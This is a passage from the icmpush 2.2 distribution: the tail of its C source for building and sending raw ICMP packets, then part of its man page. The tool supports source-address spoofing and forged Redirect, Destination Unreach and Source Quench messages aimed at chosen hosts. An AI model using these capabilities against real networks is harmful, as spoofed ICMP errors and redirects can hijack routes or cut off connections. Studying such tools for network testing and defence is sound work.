*)&packet ); parsea_args( argv, (struct my_pack *)&packet ); if ( ( proto = getprotobyname("icmp")) == NULL ) salir(2); /* Socket RAW for the ICMP protocol ... */ sock = socket( AF_INET, SOCK_RAW, proto->p_proto); if ( sock < 0 ) salir_con_error(3); /***************************** * This is *NOT* a good idea * * Use it at your own risk! * * * * * * * * * * * * * * * * if ( !geteuid() ) setuid( getuid() ); ****************************/ adjust_sock(sock); if ( icmp_info_or_err[packet.tipo_icmp].class ) /* ICMP error ... */ tam_icmp = envia_icmp_err( buf, (struct my_pack *)&packet ); else { srandom(time(0)); /* ICMP Information message ... */ tam_icmp = envia_icmp_info( buf, (struct my_pack *)&packet, proc_id, random()%0xFFFF ); } if ( more_verbose ) #ifdef SPANISH fprintf(stdout," -> Total tamaño ICMP = %d bytes\n", tam_icmp); #else fprintf(stdout," -> ICMP total size = %d bytes\n", tam_icmp); #endif envia_ip( sock, packet.ip_spoof, (struct sockaddr_in *)&packet.destino, TTL_DFL, ICMP_ERR_DFL_TOS, IPPROTO_ICMP, tam_icmp, buf ); if ( verbose ) #ifdef SPANISH fprintf(stdout,"ICMP %s enviado a %s (%s)\n", icmp_info_or_err[packet.tipo_icmp].name, argv[argc-1], inet_ntoa( packet.destino.sin_addr) ); #else fprintf(stdout,"ICMP %s packet sent to %s (%s)\n", icmp_info_or_err[packet.tipo_icmp].name, argv[argc-1], inet_ntoa( packet.destino.sin_addr) ); #endif if ( !icmp_info_or_err[packet.tipo_icmp].class && packet.timeout ) { if ( verbose ) #ifdef SPANISH fprintf(stdout, "\nRecibiendo respuestas ICMP ...\n"); #else fprintf(stdout, "\nReceiving ICMP replies ...\n"); #endif read_icmp( sock, buf, packet.timeout ); } salir(0); exit(0); // Never reached but avoid a warning :) } /********************************/ /* Adjust the raw socket values */ /* Send and receive buffers, */ /* broadcasting ... */ /********************************/ void adjust_sock( int sock ) { int on = 1, tam_sock_buf = SIZE_BIG; if ( setsockopt( sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on) ) == -1 ) salir_con_error(25); if ( setsockopt( sock, SOL_SOCKET, SO_BROADCAST, (char *)&on, sizeof(on) ) == -1 ) if ( more_verbose) fprintf(stderr,"%s: SO_BROADCAST -> %s\n", prog, sys_errlist[errno] ); if ( setsockopt( sock, SOL_SOCKET, SO_RCVBUF, (char *)&tam_sock_buf, sizeof(tam_sock_buf) ) == -1 ) if ( more_verbose ) fprintf(stderr,"%s: SO_RCVBUF -> %s\n", prog, sys_errlist[errno] ); if (setsockopt( sock, SOL_SOCKET, SO_SNDBUF, (char *)&tam_sock_buf, sizeof(tam_sock_buf) ) == -1 ) if ( more_verbose ) fprintf(stderr,"%s: SO_SNDBUF -> %s\n", prog, sys_errlist[errno] ); } /****************************************/ /* Build an ICMP information packet and */ /* put it into the address 'buffer'. */ /* Return the packet length in bytes. */ /****************************************/ int envia_icmp_info( char *buffer, struct my_pack *packet, u_short id, u_short seqnum ) { int tam = TCAB_ICMP_MSG; u_long actual_time; struct icmp2 *icp = (struct icmp2 *) buffer; icp->icmp_type = packet->tipo_icmp; icp->icmp_code = packet->cod_icmp; icp->icmp_cksum = 0; icp->icmp_id = id; icp->icmp_seq = seqnum; switch ( packet->tipo_icmp ) { case ICMP_TIMESTAMP: icp->icmp_otime = htonl( day2milisecs() ); icp->icmp_rtime = 0; icp->icmp_ttime = 0; tam += TDATA_TIMESTAMP; break; case ICMP_INFO_REQUEST: break; case ICMP_ADDRESS: icp->icmp_mask = htonl(packet->maskaddr); tam += TDATA_ADDRESS; break; case ICMP_ROUTER_SOLICIT: icp->icmp_reserved = 0; break; case ICMP_ROUTER_ADVERT: icp->icmp_num_addr = packet->num_routers; icp->icmp_addr_entry_size = 2; icp->icmp_lifetime = htons(packet->lifetime); put_routers( packet, (struct id_rdiscovery *) (buffer + sizeof(struct icmp_hdr) + TCAB_RDISC) ); tam = sizeof(struct icmp_hdr) + TCAB_RDISC + (TDATA_RDISC * packet->num_routers) ; break; case ICMP_ECHO_REQUEST: if ( packet->size_pattern ) { copymem( packet->pattern, icp->icmp_data, packet->size_pattern ); tam += packet->size_pattern; } else { actual_time = htonl( day2milisecs() ); copymem( (char *)&actual_time, icp->icmp_data, sizeof(actual_time) ); tam += sizeof(actual_time); } break; } tam = add_garbage( buffer, packet->garbage, tam); icp->icmp_cksum = in_cksum( (u_short *)icp, tam ); return( tam ); } /**************************/ /* Control the garbage. */ /* Return the size of the */ /* garbage added to the */ /* packet + the ICMP hdr. */ /**************************/ int add_garbage( char *buffer, u_long garbage, int tam ) { if ( garbage && ( tam < SIZE_BIG) ) { if ( garbage > ( SIZE_BIG - TCAB_IP - tam ) ) { if ( verbose ) if ( garbage != SIZE_BIG ) #ifdef SPANISH fprintf(stdout," -> Tamaño datos basura demasiado grande, usando m\141ximo (%d bytes)\n", SIZE_BIG - TCAB_IP - tam); #else fprintf(stdout," -> Size of data garbage too big, using maximum (%d bytes)\n", SIZE_BIG - TCAB_IP - tam); #endif fill_garbage( buffer + tam, (SIZE_BIG - TCAB_IP - tam ) ); tam = (SIZE_BIG - TCAB_IP); } else { fill_garbage( buffer + tam, garbage ); tam += garbage; } } return tam; } /***************************/ /* Fill the buffer with */ /* "data" size of garbage. */ /***************************/ void fill_garbage( char *buf, u_long data ) { u_char flag=0; if ( more_verbose ) #ifdef SPANISH fprintf(stdout," -> Tama\161o datos basura = %ld bytes\n", data ); #else fprintf(stdout," -> Data garbage size = %ld bytes\n", data ); #endif while ( data-- ) *buf++ = ((flag=!flag) ? 33 : 72); } /***************************/ /* Fetch the routers from */ /* the linked list and put */ /* them into the buffer. */ /***************************/ void put_routers( struct my_pack *packet, struct id_rdiscovery *data) { struct router *cursor = packet->router; while (cursor) { data->router_addr.s_addr = cursor->address; data->pref_level.s_addr = htonl(cursor->pref); cursor = cursor->next; ++data; } } u_long day2milisecs( void ) { struct timeval tiempo; gettimeofday( (struct timeval *) &tiempo, NULL); return ( (tiempo.tv_sec%86400) * 1000 /* From 2day secs 2 milisecs */ + tiempo.tv_usec / 1000 /* From microsecs 2 milisecs */ ); /* Milisegundos en el mismo segundo */ } /**************************************************/ /* Build an ICMP error packet and put it into the */ /* address 'buffer'. */ /* Also build the IP header and the 64 data bits */ /* of the original datagram. */ /* Return the packet length in bytes. */ /**************************************************/ int envia_icmp_err ( char *buffer, struct my_pack *packet ) { struct icmp2 *icp = (struct icmp2 *) buffer; union data_hdr *mix = (union data_hdr *) malloc(TCAB_64DATA); int elemento, tam; if ( !mix ) salir(12); iniciamem( mix, TCAB_64DATA); icp->icmp_type = packet->tipo_icmp; icp->icmp_code = packet->cod_icmp; icp->icmp_cksum = 0; icp->icmp_gwaddr.s_addr = 0; icp->icmp_ip.ip_hl = TCAB_IP >> 2; icp->icmp_ip.ip_v = 4; icp->icmp_ip.ip_tos = 0x0000; icp->icmp_ip.ip_len = htons( TCAB_IP + TCAB_ICMP + TCAB_64DATA); icp->icmp_ip.ip_id = htons(0x4A2F); icp->icmp_ip.ip_off = 0x0000; icp->icmp_ip.ip_ttl = TTL_DFL; icp->icmp_ip.ip_p = packet->protocol; icp->icmp_ip.ip_sum = 0x0000; switch( packet->tipo_icmp ) { case ICMP_REDIRECT: icp->icmp_ip.ip_src.s_addr = packet->orig; icp->icmp_ip.ip_dst.s_addr = packet->dest_red; icp->icmp_gwaddr.s_addr = packet->gway; break; case ICMP_PARAM_PROB: icp->icmp_pptr = packet->pointer; default: icp->icmp_ip.ip_src.s_addr = packet->destino.sin_addr.s_addr; icp->icmp_ip.ip_dst.s_addr = packet->orig; } icp->icmp_ip.ip_sum = in_cksum( (u_short *)(&(icp->icmp_ip)), TCAB_IP ); for ( elemento=0; elemento < MAX(data_protocols); elemento++ ) { if ( packet->protocol == data_protocols[elemento].proto ) { (*data_protocols[elemento].func_proto)( mix, packet->p_origen, packet->p_destino); elemento=32767; break; } } if ( elemento != 32767) salir(10); copymem( mix, icp + 1, TCAB_64DATA ); tam = add_garbage( buffer, packet->garbage, (TCAB_ICMP + TCAB_64DATA) ); icp->icmp_cksum = in_cksum( (u_short *)icp, tam ); return( tam ); } void proto_tcp64( union data_hdr *mix, u_short porto, u_short portd) { mix->cab_tcp.source = htons(porto); /* Source port */ mix->cab_tcp.dest = htons(portd); /* Destination port */ mix->cab_tcp.seq = htonl(0xC010C005); /* TCP sequence number */ } void proto_udp64( union data_hdr *mix, u_short porto, u_short portd ) { mix->cab_udp.source = htons(porto); /* Source port */ mix->cab_udp.dest = htons(portd); /* Destination port */ mix->cab_udp.uh_ulen = htons(12); /* Length */ mix->cab_udp.uh_sum = htons(0xFA13); /* Checksum */ } void proto_icmp64( union data_hdr *mix, u_short identif, u_short num_seq ) { mix->cab_echo.type = ICMP_ECHO_REQUEST; mix->cab_echo.code = 0x0; /* Echo Request */ mix->cab_echo.cksum = 0x0000; /* Checksum */ mix->cab_echo.id = identif; /* Echo Request ID */ mix->cab_echo.seq = num_seq; /* Echo Request sequence number */ mix->cab_echo.cksum = in_cksum( (u_short *)mix, TCAB_64DATA ); } /******************************************/ /* Build an IP datagram adding the data */ /* 'paquete' and sending it to the socket */ /* 's'. */ /* Make the fragmentation if necessary, */ /* getting the MTU value of the outgoing */ /* interface (linuz only). */ /******************************************/ void envia_ip( int s, u_long orig, struct sockaddr_in *vict, int ttl, int tos, int prot, int lenpack, u_char *paquete ) { int mtu = SIZE_BIG-TCAB_IP, len, len_pack = lenpack, offset_pack = 0; char buf_ip[SIZE_BIG]; struct ip2 *ip_p = (struct ip2 *) buf_ip; iniciamem( buf_ip, SIZE_BIG ); ip_p->ip_hl = TCAB_IP >> 2; ip_p->ip_v = 4; ip_p->ip_tos = tos; ip_p->ip_ttl = ttl; ip_p->ip_id = htons(0x3372); ip_p->ip_p = prot; /* If you want to calculate the IP header checksum * you must delete the comments of the next line * because the Linux kernel fill in automatically: * * ip_p->ip_sum = in_cksum( (u_short *)ip_p, TCAB_IP ); */ ip_p->ip_sum = 0x0000; ip_p->ip_src.s_addr = orig; ip_p->ip_dst.s_addr = vict->sin_addr.s_addr; #ifdef LINUX mtu = get_mtu( vict ) - TCAB_IP; #endif if ( more_verbose ) { fprintf(stdout, " -> MTU = %d bytes\n", mtu + TCAB_IP); #ifdef SPANISH fprintf(stdout," -> Longitud total (ICMP + IP) = %d bytes\n", len_pack + TCAB_IP); #else fprintf(stdout," -> Total packet size (ICMP + IP) = %d bytes\n", len_pack + TCAB_IP); #endif } while ( len_pack > 0 ) { len = len_pack; if ( len > mtu ) len = mtu; copymem( paquete, ip_p + 1, len ); // Copy the data ... ip_p->ip_len = htons(TCAB_IP + len); ip_p->ip_off = htons(offset_pack >> 3); len_pack-=len; #ifdef LINUX if ( (offset_pack + mtu) <= 65515 ) /* 65535 - 20 minimum IP header */ { #endif if ( len_pack > 0 ) ip_p->ip_off |= htons(IP_MF); send2sock( s, buf_ip, ntohs(ip_p->ip_len), (struct sockaddr *)vict ); #ifdef LINUX } else { /* Last packet must *NOT* have the IP_MF */ if ( verbose && !max_gbg && ( lenpack > (offset_pack + mtu) ) ) #ifdef SPANISH fprintf(stderr," -> ¡Lo siento! No puedo enviar más de %d bytes en total\n", offset_pack + mtu + TCAB_IP); #else fprintf(stderr," -> Sorry! Cannot send more than %d total bytes\n", offset_pack + mtu + TCAB_IP); #endif send2sock( s, buf_ip, ntohs(ip_p->ip_len), (struct sockaddr *)vict ); break; } #endif paquete+=len; offset_pack+=len; } } /***************************/ /* Send datalen 'len' from */ /* 'buf_ip' to socket 's'. */ /***************************/ void send2sock( int s, char *buf_ip, int len, struct sockaddr *host ) { int n; n = sendto( s, buf_ip, len, 0, host, sizeof(struct sockaddr_in) ); if ( n < 0 ) salir_con_error(9); if ( (n != len) && verbose) #ifdef SPANISH fprintf(stderr,"!!Cuidado!! --> Bytes enviados = %d\n",n); #else fprintf(stderr,"Warning!! --> Bytes sent = %d\n",n); #endif } /*************************/ /* Read ICMP packets ... */ /*************************/ sigjmp_buf myjmp; void read_icmp( int sock_lec, char *buf_snd, int timeout ) { char buf_rcv[SIZE_BIG]; sigset_t mysignal_set; struct sockaddr origen; struct icmp2 *icp = (struct icmp2 *) buf_snd; int n, tam = sizeof(struct sockaddr); sigemptyset( &mysignal_set ); sigaddset( &mysignal_set, SIGALRM ); if ( signal( SIGALRM, timeout_func ) == SIG_ERR ) salir(17); alarm( timeout ); for ( ; ; ) { if ( sigsetjmp(myjmp, 1) != 0 ) break; iniciamem( buf_rcv, SIZE_BIG ); sigprocmask(SIG_UNBLOCK, &mysignal_set, NULL); /* Unblock ... */ n = recvfrom( sock_lec, buf_rcv, sizeof(buf_rcv), 0, &origen, &tam); sigprocmask(SIG_BLOCK, &mysignal_set, NULL); /* ... Block */ if ( n < 0 ) salir(16); /* recvfrom error */ print_pack( buf_rcv, n, icp->icmp_type, icp->icmp_code, icp->icmp_id, icp->icmp_seq ); } } /********************************/ /* Print a received ICMP packet */ /********************************/ void print_pack( char *buf_rcv, int n, u_char type, u_char code, u_short id, u_short seqnum ) { struct icmp2 *icmp_rcv; struct ip2 *ip = (struct ip2 *) buf_rcv; struct hostent *thishost; icmp_rcv = (struct icmp2 *)((char *)ip + (ip->ip_hl << 2) ); if ( (icmp_rcv->icmp_type > MAX(icmp_info_or_err) ) || (icmp_rcv->icmp_type != (icmp_info_or_err[type].reply) ) ) { if ( more_verbose ) { LINE; fprintf(stdout, "%s ...\n", inet_ntoa(ip->ip_src)); print_err_pack( icmp_rcv ); LINE; } return; } if ( icmp_rcv->icmp_type != ICMP_ROUTER_ADVERT ) { if ( icmp_rcv->icmp_id != id ) /* Control of ID and Seq can't be made */ { /* within an ICMP Router Advertismenet */ LINE; #ifdef SPANISH fprintf(stdout, "%-15s -> Id de ICMP incorrecto...\n", inet_ntoa(ip->ip_src) ); #else fprintf(stdout, "%-15s -> Wrong ICMP Id...\n", inet_ntoa(ip->ip_src) ); #endif if ( more_verbose ) print_err_pack ( icmp_rcv ); LINE; return; } if ( icmp_rcv->icmp_seq != seqnum ) { LINE; #ifdef SPANISH fprintf(stdout,"%-15s -> Número de secuencia incorrecto...\n", inet_ntoa(ip->ip_src)); #else fprintf(stdout,"%-15s -> Incorrect Sequence number...\n", inet_ntoa(ip->ip_src)); #endif if ( more_verbose ) print_err_pack( icmp_rcv ); LINE; return; } } if ( resolve ) { thishost = gethostbyaddr((char *)&ip->ip_src, 4, AF_INET ); if ( !thishost ) fprintf(stdout, "%-15s ", inet_ntoa(ip->ip_src)); else fprintf(stdout, "%-15s ", thishost->h_name); } else fprintf(stdout, "%-15s ", inet_ntoa(ip->ip_src)); /* Go to the appropiate ICMP print reply function ...*/ (*icmp_info_or_err[icmp_rcv->icmp_type].print_packet) ( ip->ip_src, icmp_rcv ); } void dont_print( struct in_addr ip_src, struct icmp2 *icmp_rcv ) { #ifdef SPANISH fprintf(stdout, "(%s 0x%X) -> Comorrl? No es posible\n", icmp_info_or_err[icmp_rcv->icmp_type].name, icmp_rcv->icmp_type); #else fprintf(stdout, "(%s 0x%X) -> Uuuu? Not possible\n", icmp_info_or_err[icmp_rcv->icmp_type].name, icmp_rcv->icmp_type); #endif } /***********************************/ /* Print an ICMP Info Reply packet */ /***********************************/ void print_info_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv ) { fprintf(stdout, "-> %s\n", icmp_info_or_err[icmp_rcv->icmp_type].name); } /*****************************************/ /* Print an ICMP Time stamp Reply packet */ /*****************************************/ void print_timestamp_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv ) { struct tm *tiempo; u_long aux_temp; /* Time when this reply was sent by the dest ... */ aux_temp = ntohl(icmp_rcv->icmp_ttime)/1000; tiempo = localtime((time_t *)&aux_temp); if ( more_verbose ) { #ifdef SPANISH fprintf(stdout, "-> %s transmitido a las %.2d:%.2d:%.2d\n", icmp_info_or_err[icmp_rcv->icmp_type].name, tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec); #else fprintf(stdout, "-> %s transmited at %.2d:%.2d:%.2d\n", icmp_info_or_err[icmp_rcv->icmp_type].name, tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec); #endif } else fprintf(stdout, "-> %.2d:%.2d:%.2d\n", tiempo->tm_hour, tiempo->tm_min, tiempo->tm_sec); } /*******************************************/ /* Print an ICMP Address Mask Reply packet */ /*******************************************/ void print_address_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv ) { struct in_addr mascara; mascara.s_addr = icmp_rcv->icmp_mask; if ( more_verbose ) fprintf(stdout, "-> %s (%s)\n", icmp_info_or_err[icmp_rcv->icmp_type].name, inet_ntoa(mascara)); else fprintf(stdout, "-> %s\n", inet_ntoa( mascara ) ); } /*********************************************/ /* Print an ICMP Router Advertisement packet */ /*********************************************/ void print_router_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv ) { int entry; u_int life; struct id_rdiscovery *data_rdisc; struct hostent *thishost; fprintf(stdout, "-> %s\n", icmp_info_or_err[icmp_rcv->icmp_type].name); data_rdisc = (struct id_rdiscovery *) &icmp_rcv->icmp_rdiscovery; for ( entry=1; entry <= icmp_rcv->icmp_num_addr; entry++, data_rdisc++) { #ifdef SPANISH fprintf(stdout, " Dirección "); #else fprintf(stdout, " Address "); #endif if ( resolve ) { thishost = gethostbyaddr((char *)&data_rdisc->router_addr, 4, AF_INET ); if ( !thishost ) fprintf(stdout, "%-2d= %s ", entry, inet_ntoa(data_rdisc->router_addr)); else fprintf(stdout, "%-2d= %s ", entry, thishost->h_name); } else fprintf(stdout, "%-2d= %s ", entry, inet_ntoa(data_rdisc->router_addr)); fprintf(stdout, " Prefer. -> %ld\n", ntohl(data_rdisc->pref_level.s_addr) ); } fprintf(stdout, " Lifetime = "); life = ntohs(icmp_rcv->icmp_lifetime); if ( life < 60 ) fprintf(stdout, "%02d secs\n", life); else { if ( life < 3600 ) fprintf(stdout, "%02d:%02d min\n", life / 60, life % 60); else fprintf(stdout, "%02d:%02d:%02d hours\n", life / 3600, (life % 3600) / 60, life % 60); } } /***********************************/ /* Print an ICMP Echo Reply packet */ /***********************************/ void print_echo_reply( struct in_addr ip_src, struct icmp2 *icmp_rcv ) { u_long sent_time; if ( more_verbose && !is_pattern ) { /* Time when our request was sent by us ... */ copymem( icmp_rcv->icmp_data, (char *)&sent_time, sizeof(sent_time)); #ifdef SPANISH fprintf(stdout, "-> %s con RTT = %.1f ms\n", icmp_info_or_err[icmp_rcv->icmp_type].name, (float)(day2milisecs() - ntohl(sent_time)) ); #else fprintf(stdout, "-> %s with RTT = %.1f ms\n", icmp_info_or_err[icmp_rcv->icmp_type].name, (float)(day2milisecs() - ntohl(sent_time)) ); #endif } else { if ( is_pattern ) fprintf(stdout, "-> %s\n", icmp_info_or_err[icmp_rcv->icmp_type].name); else { copymem( icmp_rcv->icmp_data, (char *)&sent_time, sizeof(sent_time)); fprintf(stdout, "-> %.1f ms\n", (float)(day2milisecs() - ntohl(sent_time)) ); } } } /*****************************/ /* Print an ICMP packet that */ /* doesn't correspond to us */ /*****************************/ void print_err_pack( struct icmp2 *icmp_rcv ) { #ifdef SPANISH char *type = "Desconocido"; #else char *type = "Unknown"; #endif if ( icmp_rcv->icmp_type <= MAX(icmp_info_or_err) ) type = icmp_info_or_err[icmp_rcv->icmp_type].name; #ifdef SPANISH fprintf(stdout," Tipo = %s (0x%X)\n", type, icmp_rcv->icmp_type); fprintf(stdout," Código = 0x%-4X Checksum = 0x%X\n", icmp_rcv->icmp_code, icmp_rcv->icmp_cksum); fprintf(stdout," Ident. = 0x%-4X Num_sec = 0x%X\n", icmp_rcv->icmp_id, icmp_rcv->icmp_seq); #else fprintf(stdout, " Type = %s (0x%X)\n", type, icmp_rcv->icmp_type); fprintf(stdout, " Code = 0x%-4X Checksum = 0x%X\n", icmp_rcv->icmp_code, icmp_rcv->icmp_cksum); fprintf(stdout, " Id = 0x%-4X Seq# = 0x%X\n", icmp_rcv->icmp_id, icmp_rcv->icmp_seq); #endif } /***********************/ /* Our SIGALRM handler */ /**********************/ void timeout_func( int nothing ) { /* Do nothing ... */ siglongjmp( myjmp, 1); } /**********************************************/ /* This function has been obtained from the */ /* book "UNIX NETWORK PROGRAMMING" (1st Ed.), */ /* by Richard W. Stevens (Hyper-Guru). */ /* ;) */ /**********************************************/ int in_cksum( u_short *p, int n) { register u_short answer; register long sum = 0; u_short odd_byte = 0; while( n > 1 ) { sum += *p++; n -= 2; } /* mop up an odd byte, if necessary */ if( n == 1 ) { *(u_char *)(&odd_byte) = *(u_char *)p; sum += odd_byte; } sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* ones-complement, truncate*/ return (answer); } char *pasa( struct sockaddr_in *sin ) { return ((char *) inet_ntoa(sin->sin_addr)); } /***************************************/ /* Exit from program without returning */ /* a system error. The returned code */ /* == num_error. */ /***************************************/ void salir( int num_error ) { if ( num_error || verbose ) fprintf(stderr, "%s: %s\n", prog, mensaje_err[num_error][LNG]); exit(num_error); } /***********************************/ /* Exit from program returning the */ /* system error. */ /* Return num_error to the system. */ /***********************************/ void salir_con_error( int num_error ) { fprintf(stderr,"%s: %s -> %s\n", prog, mensaje_err[num_error][LNG], sys_errlist[errno] ); exit(num_error); } /****************************/ /* Init my packet struct */ /* with the default values. */ /****************************/ void init_packet_struct( struct my_pack *packet ) { packet->ip_spoof = 0x0000; packet->destino.sin_family = AF_INET; packet->destino.sin_addr.s_addr = 0x0001; packet->gway = 0x0001; packet->dest_red = 0x0001; packet->orig = 0x0001; packet->cod_icmp = 0; packet->tipo_icmp = 255; packet->protocol = IPPROTO_TCP; packet->p_origen = 0; packet->p_destino = 0; packet->maskaddr = 0; packet->router = NULL; packet->lifetime = LIFETIME_DFL; packet->num_routers = 0; packet->size_pattern = 0; packet->timeout = TIMEOUT_DFL; packet->garbage = 0; packet->pointer = 0; } icmpush-2.2.orig/icmpush.80100644000175000017500000004126106664227443013667 0ustar domdom.\" Man page for ICMPush (c) Slayer .\" =============================== .\" .\" You may distribute under the terms of the GNU General Public .\" License as specified in the LICENSE file that comes with the .\" ICMPush v2.2 distribution. .\" .\" Man page author: .\" wait_man .\" Date: .\" Mon Feb 8 01:16:09 CET 1999 .\" Translate from the Spanish to English by: .\" BINARIA .\" .TH "ICMPUSH" "8" "February 22, 1999" "icmpush v2.2" .SH "NAME" icmpush \- ICMP packet builder .SH "SYNOPSIS" .B icmpush .I type [options] host .SH "DESCRIPTION" .B icmpush is a tool that builds ICMP packets fully customized from command line. It supports the following ICMP error types: \fIRedirect\fP, \fISource Quench\fP, \fITime Exceeded\fP, \fIDestination Unreach\fP and \fIParameter Problem\fP. And the following ICMP information types: \fIAddress Mask Request\fP, \fITimestamp\fP, \fIInformation Request\fP, \fIEcho Request\fP, \fIRouter Solicitation\fP and \fIRouter Advertisement\fP. Is not of our concern to give a fully description of how ICMP protocol works, but the more knowledgement we have we can fully understand its management, use and posibilities of this tool. The quantity of arguments needed can appear excessive but his own author reminds that some imperative data must be given through a command line for a fully adjustment to the protocol format on a ICMP packet construction. A long number of examples is given at the \fIEXAMPLES\fP section of this page that shows a real use of this program. .SH "OPTIONS" .IP "\fB\-h\fP, \fB--help\fP" Help. .IP "\fB\-V\fP, \fB--version\fP" Program version. .IP "\fB\-v\fP, \fB--verbose\fP" Informative mode. .IP "\fB\-vv\fP, \fB--more_verbose\fP" More informative. Useful when debugging. .PP The ICMP type \fItype\fP can be any of the following below: .IP "\fB\-du\fP, \fB--dest_unreach\fP" Destination Unreach. IP packet couldn't be given. This ICMP type is \fIerror\fP. .IP "\fB\-sq\fP, \fB--src_quench\fP" Source Quench. IP packet is not given do a congestion on the net. This ICMP type is \fIerror\fP. .IP "\fB\-red\fP, \fB--redirect\fP" Redirect. Request to forward IP packets through another router. This ICMP type is \fIerror\fP. .IP "\fB\-echo\fP, \fB--echo_request\fP" Echo Request. Request sent to a host to receive an echo reply. This ICMP type is \fIinformation\fP. .IP "\fB\-rta\fP, \fB--router_advert\fP \fIaddress\fP[\fI/preference\fP]" Router Advertisement. Router trasmits one or more routers with address \fIaddress\fP and preference \fIpreference\fP. If this is ommited, default preference 0 is given. This ICMP type is \fIinformation\fP. .IP "\fB\-rts\fP, \fB--router_solicit\fP" Router Solicitation. Host requeriment for a message of one or more routers. Like the previous, is a part of the messages exchange Router Discovery and this ICMP type is \fIinformation\fP. .IP "\fB\-tx\fP, \fB--time_exc\fP" Time Exceeded. Time Exceeded for an IP packet. This ICMP type is \fIerror\fP. .IP "\fB\-param\fP, \fB--param_problem\fP" Parameter Problem. Erroneous value on a variable of IP header. This ICMP type is \fIerror\fP. .IP "\fB\-tstamp\fP, \fB--timestamp\fP" Timestamp. Host request to receive the time of another host. This ICMP type is \fIinformation\fP. .IP "\fB\-info\fP, \fB--info_req\fP" Information Request. Host request to receive an Info Reply from another host. This ICMP type is \fIinformation\fP. .IP "\fB\-mask\fP, \fB--mask_req\fP" Address Mask Request. Used to find out a host network mask. This ICMP type is \fIinformation\fP. .PP The \fIoptions\fP can be any of the following: .IP "\fB\-sp\fP, \fB--spoof\fP \fIaddress\fP" IP address to be used as the source of the ICMP packet. .IP "\fB\-to\fP, \fB--timeout\fP \fIsecs\fP" Timeout in seconds to read the answers. Only valid on ICMPs of \fIinformation\fP type but the Router Advertisement type (\fB-rta\fP). Default is 5 seconds. If 0 is given answers can not be read. .IP "\fB\-n\fP, \fB--no_resolve\fP" Don't use name resolution. .IP "\fB\-lt\fP, \fB--lifetime\fP \fIsecs\fP" Lifetime in seconds of the router announcement. Only valid with Router Advertisement (\fI-rta\fP) type. 1800 seconds on default (30'). .IP "\fB\-gw\fP, \fB--gateway\fP \fIaddress\fP" Route gateway address on an ICMP Redirect (\fB-red\fP). On default will be the spoof address (\fB-sp\fP), if it has been specified, or the outgoing IP address if it has not been specified. .IP "\fB\-dest\fP, \fB--route_dest\fP \fIaddress\fP" Route destination address on an ICMP Redirect (\fB-red\fP). This is a required option when sending an ICMP Redirect. .IP "\fB\-orig\fP, \fB--orig_host\fP \fIaddress\fP" Original host within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP. On default will be the same as the IP of the host that sends the ICMP packet. .IP "\fB\-psrc\fP, \fB--port_src\fP \fIport\fP" Source port (tcp or udp) within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP. 0 on default. .IP "\fB\-pdst\fP, \fB--port_dest\fP \fIport\fP" Destination port (tcp or udp) within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP. 0 on default. .IP "\fB\-prot\fP, \fB--protocol\fP \fIicmp\fP|\fItcp\fP|\fIudp\fP" Protocol to be used within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP. Must be one of the three listed above. Tcp on default. .IP "\fB\-id\fP, \fB--echo_id\fP \fIidentificator\fP" Echo identificator within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP when the IP header protocol of the 64 bits data field (\fB-prot\fP) is icmp. 0 on default. .IP "\fB\-seq\fP, \fB--echo_seq\fP \fIsequence\fP" Echo sequence number within the IP header sent in the 64 bits data field of an ICMP \fIerror\fP when the IP header protocol of the 64 bits data field (\fB-prot\fP) is icmp. 0 on default. .IP "\fB\-pat\fP, \fB--pattern\fP \fIpattern\fP" Data pattern to send on an Echo Request (\fB-echo\fP). .IP "\fB\-gbg\fP, \fB--garbage\fP \fIbytes\fP|\fImax\fP" Number of garbage bytes that will be sent on any ICMP packet. With \fImax\fP the maximum possible will be sent. .IP "\fB\-ptr\fP, \fB--pointer\fP \fIbyte\fP" Pointer to erroneus byte \fIbyte\fP on an ICMP packet showing a parameter problem. Valid only on Parameter Problem type (\fB-param\fP). .IP "\fB\-c\fP, \fB--code\fP \fIcode\fP|\fInum\fP|\fImax\fP" ICMP code to send. Code \fIcode\fP valid for Destination Unreach (\fB-du\fP), Redirect (\fB-red\fP) and Time Exceeded (\fB-tx\fP) types. Numerical code can be specified for the ICMP types that doesn't have (Echo Request, Information Request, Address Mask Request, Router Solicitation, Router Advertisement, Source Quench, Parameter Problem and Timestamp). Using \fImax\fP an ICMP code bigger than the admited ones will be sent. Next \fIICMP CODES\fP section enumerates the valid \fIcode\fP types. .SH "ICMP CODES" Valid \fIcodes\fP used with Destination Unreach, Redirect y Time Exceeded types are, .IP "- Used with \fBDestination Unreach\fP type (\fB-du\fP):" .PP \fInet-unreach\fP (Net Unreachable) The destination net is unreacheable. \fIhost-unreach\fP (Host Unreachable) The destination host is unreacheable. \fIprot-unreach\fP (Protocol Unreachable) desired protocol is unreacheable to destination host. \fIport-unreach\fP (Port Unreachable) desired port is unreacheable to destination host. \fIfrag-needed\fP (Fragmentation Needed and Don't Fragment was Set) Shows that IP packet had to be fragmented because of its size but the sender did not allowed it because of DF (DON'T FRAGMENT) flag. \fIsroute-fail\fP (Source Route Failed) could'nt follow the route indicated on IP packet. \fInet-unknown\fP (Destination Network Unknown) Destination network is unknown. \fIhost-unknown\fP (Destination Host Unknown) Destination host unknown but network is. \fIhost-isolated\fP (Source Host Isolated) Can't reach destination host. \fInet-ano\fP (Communication with Destination Network is Administratively Prohibited) access network is denied through firewall or similar on receiver side. \fIhost-ano\fP (Communication with Destination Host is Administratively Prohibited) access host is denied through firewall or similar on receiver side. \fInet-unr-tos\fP (Destination Network Unreachable for Type of Service) indicates on destination network that the Type Of Service (TOS) applied for is not allowed. \fIhost-unr-tos\fP (Destination Host Unreachable for Type of Service) shows that destination host is unreachable with applied TOS. \fIcom-admin-prohib\fP (Communication Administratively Prohibited) a router can't forward a packet because of administrative filter. \fIhost-precedence-viol\fP (Host Precedence Violation) IP packet procedence is not allowed. \fIprecedence-cutoff\fP (Precedence cutoff in effect) a 